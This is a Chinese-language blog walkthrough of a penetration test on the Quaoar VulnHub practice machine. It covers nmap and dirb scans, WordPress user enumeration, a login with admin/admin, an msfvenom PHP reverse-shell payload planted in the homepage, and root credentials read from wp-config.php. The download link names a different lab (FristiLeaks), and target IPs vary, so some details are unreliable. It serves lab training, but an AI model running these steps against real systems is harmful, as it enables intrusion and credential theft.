网络安全从0到0.5之Quaoar靶机渗透测试

admin 2022年1月28日10:44:32网络安全从0到0.5之Quaoar靶机渗透测试已关闭评论155 views字数 1038阅读3分27秒阅读模式

download:

https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova

环境部署:

1.下载后先进行对mac地址的扫描发现

nmap -sP 172.16.10.0/24

网络安全从0到0.5之Quaoar靶机渗透测试

网络安全从0到0.5之Quaoar靶机渗透测试

2.也可以在靶机开机后查看开机的提醒信息

网络安全从0到0.5之Quaoar靶机渗透测试

信息收集

首先使用nmap扫描工具进行对开放端口的扫描

nmap -sV -n -p- 172.16.10.181

网络安全从0到0.5之Quaoar靶机渗透测试

开放端口:

22 53 80 110 139 143 445 993 995

web

先去查看80端口

网络安全从0到0.5之Quaoar靶机渗透测试

发现是一张图片

使用ctrl+u查看源码,没有注释信息,就是一张图片

接着使用dirb对网站目录进行探测

dirb http://172.16.10.182

网络安全从0到0.5之Quaoar靶机渗透测试

主要是这几个目录,发现有wordpress目录

那就使用wpscan工具

先对扫描网站的用户

wpscan --url "http://172.16.10.182/wordpress" --enumerate u

网络安全从0到0.5之Quaoar靶机渗透测试

用户:admin、wpuser

因为看到有admin管理员用户,那就先用弱口令(admin)尝试进行登录

用户名:admin

密码:admin

网络安全从0到0.5之Quaoar靶机渗透测试

登录成功

反弹shell

进入编辑模块,可以直接对网站的主页进行修改,更改为反弹shell,再次进行访问主页时,kail中的exploit/multi/handler模块进行监听就可以得到shell

*生成反弹shell*

msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.10.185 lport=1122 -f raw -o shell.php

将主页内容进行修改,记得更新

网络安全从0到0.5之Quaoar靶机渗透测试

在kail中开启监听,监听的ip和端口要和在生成反弹shell时的一致

网络安全从0到0.5之Quaoar靶机渗透测试

网络安全从0到0.5之Quaoar靶机渗透测试

拿到shell

获取root密码

因为拿到shell的权限只是www-data权限,需要拿到靶机的最高权限root

使用python语句进入交互式

python -c 'import pty;pty.spawn("/bin/bash")'

网络安全从0到0.5之Quaoar靶机渗透测试

查看当前目录下的文件,发现有wp-config.php文件,直接进行查看

网络安全从0到0.5之Quaoar靶机渗透测试

网络安全从0到0.5之Quaoar靶机渗透测试

发现了用户名和密码

root:rootpassword!

直接su root,尝试切换root用户

网络安全从0到0.5之Quaoar靶机渗透测试

成功

获得flag

find / -name flag.txt

网络安全从0到0.5之Quaoar靶机渗透测试

1.root用户根目录下的flag

网络安全从0到0.5之Quaoar靶机渗透测试

2.wpadmin用户根目录下的flag

网络安全从0到0.5之Quaoar靶机渗透测试

重点补充

wp-config.php文件是wordpress建站的配置文件,里面有wordpress的数据库信息,语言信息。所以会存在一些配置信息的泄露。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月28日10:44:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   网络安全从0到0.5之Quaoar靶机渗透测试http://cn-sec.com/archives/757906.html